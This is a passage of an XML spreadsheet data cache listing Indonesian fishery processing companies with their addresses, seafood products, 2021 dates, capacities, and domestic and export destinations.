    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemuru, Sarden, Layang, Tamban, Makerel)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="349851"/>
    <s v="Kota Jakarta Utara, Kabupaten Jembrana, Kota Denpasar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="23757"/>
    <x v="88"/>
    <s v="PT. BALI MAYA PERMAI FOOD CANNING INDUSTRY"/>
    <s v="Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="173344"/>
    <s v="Kota Jakarta Utara, Kabupaten Jembrana, Kota Denpasar"/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="23759"/>
    <x v="917"/>
    <s v="CV, SURYA BLAMBANGAN KENCANA"/>
    <s v="Jl, Sampangan No,9A, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Barat"/>
    <m/>
  </r>
  <r>
    <n v="23760"/>
    <x v="918"/>
    <s v="MINI PLANT PANDANG LAUT (PT. KELOLA MINA LAUT)"/>
    <s v="Dusun Barat Sungai, Kel. Banyu Sangka, Kec. Tanjung Bumi, Kabupaten Bangkalan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23761"/>
    <x v="192"/>
    <s v="PT. MINA JAYA LESTARI"/>
    <s v="Pergudangan Margomulyo Permai Blok J-12, J-12A, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Surabaya"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23766"/>
    <x v="919"/>
    <s v="PT. YUXING ALGAE INTERNATIONAL"/>
    <s v="Pesisir Timur RT 001 RW 001, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="750000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="23768"/>
    <x v="920"/>
    <s v="PT. BAHARI MAKMUR SEJATI CABANG MEDAN"/>
    <s v="Jl. Pulau Sumatera No.13 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23769"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Lemadang, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="56000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="23770"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23771"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23772"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="175000"/>
    <m/>
    <s v="Suriname"/>
  </r>
  <r>
    <n v="23773"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Mas, Gurami, Patin, Nila)"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="23774"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23775"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23776"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Tanpa Duri Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="4086000"/>
    <s v="Kota Probolinggo"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23777"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="23778"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Patin Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="23779"/>
    <x v="921"/>
    <s v="PT. DIMAS REIZA PERWIRA"/>
    <s v="Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Demersal Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="23780"/>
    <x v="867"/>
    <s v="PT, AWINDO MAKMUR SEJAHTERA"/>
    <s v="Jl, Cumi Raya No, 8 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Suriname, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23781"/>
    <x v="922"/>
    <s v="PD. BARUNA NUSANTARA"/>
    <s v="Jl. Sohiri, Kel. Tuada, Kec. Jailolo, Kabupaten Halmahera Barat&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="400000"/>
    <s v="Kabupaten Probolinggo, Kota Surabaya, Kabupaten Gianyar"/>
    <s v="Afghanistan, India, Korea, Democratic People's Republic of, Morocco, Saudi Arabia"/>
  </r>
  <r>
    <n v="23782"/>
    <x v="922"/>
    <s v="PD. BARUNA NUSANTARA"/>
    <s v="Jl. Sohiri, Kel. Tuada, Kec. Jailolo, Kabupaten Halmahera Barat&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Teri, Tongkol, Layang, Cakalang)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Surabaya"/>
    <s v="Afghanistan, India, Korea, Democratic People's Republic of, Morocco, Saudi Arabia"/>
  </r>
  <r>
    <n v="23783"/>
    <x v="923"/>
    <s v="PT. BAGAN SUKSES MANDIRI"/>
    <s v="Jl. Ikan Tuna Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Cakalang, Tenggiri)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Jakarta Barat, Kabupaten Cilacap, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23784"/>
    <x v="923"/>
    <s v="PT. BAGAN SUKSES MANDIRI"/>
    <s v="Jl. Ikan Tuna Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Barat, Kabupaten Cilacap, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23786"/>
    <x v="924"/>
    <s v="PT. SURYA INDOALGAS"/>
    <s v="Jl. Raya Wonoayu, Kel. Jimbaran Wetan, Kec. Wonoayu, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Agar-Agar"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="192000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23787"/>
    <x v="925"/>
    <s v="PT. KARYA MANDIRI CITRAMINA"/>
    <s v="Jl. Cumi Raya No.5 Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-09T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Surabaya"/>
    <s v="Philippines"/>
  </r>
  <r>
    <n v="23789"/>
    <x v="926"/>
    <s v="PT. SUMBER INTI PANGAN"/>
    <s v="Desa Cilowa RT 16 RW 04, Dusun Pahing, Kec. Kramat Mulya, Kabupaten Kuningan&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Udang"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="15000"/>
    <s v="Kabupaten Bekasi"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23790"/>
    <x v="926"/>
    <s v="PT. SUMBER INTI PANGAN"/>
    <s v="Desa Cilowa RT 16 RW 04, Dusun Pahing, Kec. Kramat Mulya, Kabupaten Kuningan&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tepung Terasi Udang"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="28000"/>
    <s v="Kabupaten Mojokerto"/>
    <m/>
  </r>
  <r>
    <n v="23791"/>
    <x v="164"/>
    <s v="PT. SARI SEGAR LAUT INDONESIA"/>
    <s v="Jl. Ikan Tuna Raya Timur I Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Layur)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23794"/>
    <x v="927"/>
    <s v="PT, UTAMAKAN KEMAKMURAN RAKYAT"/>
    <s v="Dusun Sentosa, Kel, Lekopancing, Kec, Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Kakap, Bawal, Katamba, Kerapu)"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Makassar"/>
    <s v="Australia, Hong Kong, Macao, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23795"/>
    <x v="927"/>
    <s v="PT, UTAMAKAN KEMAKMURAN RAKYAT"/>
    <s v="Dusun Sentosa, Kel, Lekopancing, Kec, Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Kuwe, Gindara, Selar, Tenggiri, Selar Kuning)"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Makassar"/>
    <s v="Australia, Hong Kong, Macao, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23796"/>
    <x v="927"/>
    <s v="PT, UTAMAKAN KEMAKMURAN RAKYAT"/>
    <s v="Dusun Sentosa, Kel, Lekopancing, Kec, Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Makassar"/>
    <s v="Australia, Hong Kong, Macao, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23798"/>
    <x v="928"/>
    <s v="CV. SUMBER HARTA LAUT MAS"/>
    <s v="Jl. Sisingamangaraja No.1-2 RT 041 RW 009, Kel. Passo, Kec. Baguala, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Deho, Marlin, Layaran, Layang, Cakalang)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23799"/>
    <x v="928"/>
    <s v="CV. SUMBER HARTA LAUT MAS"/>
    <s v="Jl. Sisingamangaraja No.1-2 RT 041 RW 009, Kel. Passo, Kec. Baguala, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23800"/>
    <x v="928"/>
    <s v="CV. SUMBER HARTA LAUT MAS"/>
    <s v="Jl. Sisingamangaraja No.1-2 RT 041 RW 009, Kel. Passo, Kec. Baguala, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="23801"/>
    <x v="929"/>
    <s v="CV. ALAM SEMESTA HASILINDO"/>
    <s v="Jl. Kepiting, Kel. Dufa-Dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="93600"/>
    <s v="Kota Denpasar"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23802"/>
    <x v="930"/>
    <s v="CV. SIMPUL AGRO GLOBALINDO"/>
    <s v="Jl. Pattene Komp. Pergudangan Pattene Business Park Blok B/C No.11, Kel. Pabentengang, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Bogor, Kota Surabaya"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="23803"/>
    <x v="929"/>
    <s v="CV. ALAM SEMESTA HASILINDO"/>
    <s v="Jl. Kepiting, Kel. Dufa-Dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="93600"/>
    <s v="Kota Denpasar"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23804"/>
    <x v="929"/>
    <s v="CV. ALAM SEMESTA HASILINDO"/>
    <s v="Jl. Kepiting, Kel. Dufa-Dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="93600"/>
    <s v="Kota Bitung"/>
    <s v="Hong Kong, Indonesia, Japan, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23805"/>
    <x v="929"/>
    <s v="CV. ALAM SEMESTA HASILINDO"/>
    <s v="Jl. Kepiting, Kel. Dufa-Dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="93600"/>
    <s v="Kota Denpasar, Kota Manado, Kota Bitung, Kota Makassar"/>
    <s v="Hong Kong, Indonesia, Japan, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23806"/>
    <x v="931"/>
    <s v="UD. BAHARI MITRA LESTARI"/>
    <s v="Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Deho, Kembung, Malalugis, Maesang, Layang, Cakalang)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23807"/>
    <x v="667"/>
    <s v="PT. WAHYU PRADANA BINAMULIA"/>
    <s v="Jl. Kima Raya I Blok D No.2C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="150"/>
    <m/>
    <s v="Russian Federation"/>
  </r>
  <r>
    <n v="23808"/>
    <x v="667"/>
    <s v="PT. WAHYU PRADANA BINAMULIA"/>
    <s v="Jl. Kima Raya I Blok D No.2C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Segar"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="150"/>
    <m/>
    <s v="Russian Federation"/>
  </r>
  <r>
    <n v="23809"/>
    <x v="932"/>
    <s v="PT. SUMBER LAUTAN NUSANTARA"/>
    <s v="Jl. Lantebung No.168, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Mexico, United States"/>
  </r>
  <r>
    <n v="23810"/>
    <x v="932"/>
    <s v="PT. SUMBER LAUTAN NUSANTARA"/>
    <s v="Jl. Lantebung No.168, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Beku (Tongkol, Lemadang, Marlin, Layaran, Cakalang, Tenggiri)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="China, Japan, Viet Nam"/>
  </r>
  <r>
    <n v="23811"/>
    <x v="932"/>
    <s v="PT. SUMBER LAUTAN NUSANTARA"/>
    <s v="Jl. Lantebung No.168, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Pisang-pisang, Kerapu, Kakatua, Kakap, Kurisi, Barramundi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23812"/>
    <x v="932"/>
    <s v="PT. SUMBER LAUTAN NUSANTARA"/>
    <s v="Jl. Lantebung No.168, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23814"/>
    <x v="933"/>
    <s v="PT. SUKSES CITRA PANGAN"/>
    <s v="Jl. Mayjen Sutoyo No.124, Kel. Kemalaraja, Kec. Baturaja Timur, Kabupaten Ogan Komering Ulu&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Layang, Benggol)"/>
    <d v="2021-02-10T00:00:00"/>
    <n v="325000"/>
    <s v="Kabupaten Ogan Komering Ulu, Kabupaten Muara Enim, Kabupaten Ogan Komering Ulu Selatan, Kabupaten Ogan Komering Ulu Timur, Kota Prabumulih, Kota Pagar Alam"/>
    <m/>
  </r>
  <r>
    <n v="23823"/>
    <x v="934"/>
    <s v="RAFIN'S"/>
    <s v="Jl. Jendral Sudirman No.2 RT 03 RW 03, Kel. Fajaresuk, Kec. Pringsewu, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Keripik Kulit Ikan"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="3240"/>
    <s v="Kabupaten Pringsewu"/>
    <m/>
  </r>
  <r>
    <n v="23824"/>
    <x v="934"/>
    <s v="RAFIN'S"/>
    <s v="Jl. Jendral Sudirman No.2 RT 03 RW 03, Kel. Fajaresuk, Kec. Pringsewu, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Abon Patin"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="720"/>
    <s v="Kabupaten Pringsewu"/>
    <m/>
  </r>
  <r>
    <n v="23828"/>
    <x v="935"/>
    <s v="CV. TUNA LESTARI"/>
    <s v="Jl. Gunung Tilongkabila, Kel. Biawu, Kec. Kota Selatan, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Beku"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Batam, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="23829"/>
    <x v="935"/>
    <s v="CV. TUNA LESTARI"/>
    <s v="Jl. Gunung Tilongkabila, Kel. Biawu, Kec. Kota Selatan, Kota Gorontalo&lt;br&gt;Gorontalo"/>
    <n v="25"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Batam, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="23830"/>
    <x v="936"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Industri No.29 A, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="2200000"/>
    <s v="Kota Surabaya"/>
    <s v="Canada, China, Japan, Turkey, United States"/>
  </r>
  <r>
    <n v="23831"/>
    <x v="936"/>
    <s v="PT. GRAHAMAKMUR CIPTAPRATAMA"/>
    <s v="Jl. Industri No.29 A, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="1800"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23832"/>
    <x v="937"/>
    <s v="PT. SUMBER NELAYAN INDONESIA"/>
    <s v="Dusun V, Kel. Sei Lunang, Kec. Sei Kepayang Timur, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Rebon Kering"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Wonosobo, Kota Surakarta, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Tangerang, Kota Banjarmasin, Kota Samarinda"/>
    <s v="Brunei Darussalam, Cambodia, China, Lao People's Democratic Republic, Malaysia, Myanmar, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23833"/>
    <x v="937"/>
    <s v="PT, SUMBER NELAYAN INDONESIA"/>
    <s v="Dusun V, Kel, Sei Lunang, Kec, Sei Kepayang Timur, Kabupaten Asahan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Terasi Udang Kering"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Wonosobo, Kota Surakarta, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Tangerang, Kota Banjarmasin, Kota Samarinda"/>
    <s v="Brunei Darussalam, Cambodia, China, Lao People's Democratic Republic, Malaysia, Myanmar, Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23834"/>
    <x v="938"/>
    <s v="PT. LAUT PANEN RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 305 dan 603, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Salem)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23837"/>
    <x v="938"/>
    <s v="PT. LAUT PANEN RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 305 dan 603, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Bogor, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="23840"/>
    <x v="939"/>
    <s v="PT. INDOSIGMA SURYA CIPTA"/>
    <s v="Jl. Raya Kedungpane No.17, Semarang-Boja Km 4,3, Kel. Bringin, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerupuk Udang"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="427200"/>
    <s v="Kota Jakarta Selatan"/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="23843"/>
    <x v="940"/>
    <s v="CV. INTI YUDA SAMUDRA"/>
    <s v="Jl. Pramuka No.27B, Kel. Cibinong, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Lobster Beku"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bogor, Kabupaten Bekasi, Kota Depok, Kabupaten Tangerang"/>
    <s v="Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23844"/>
    <x v="940"/>
    <s v="CV. INTI YUDA SAMUDRA"/>
    <s v="Jl. Pramuka No.27B, Kel. Cibinong, Kec. Gunung Sindur, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-03-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bogor"/>
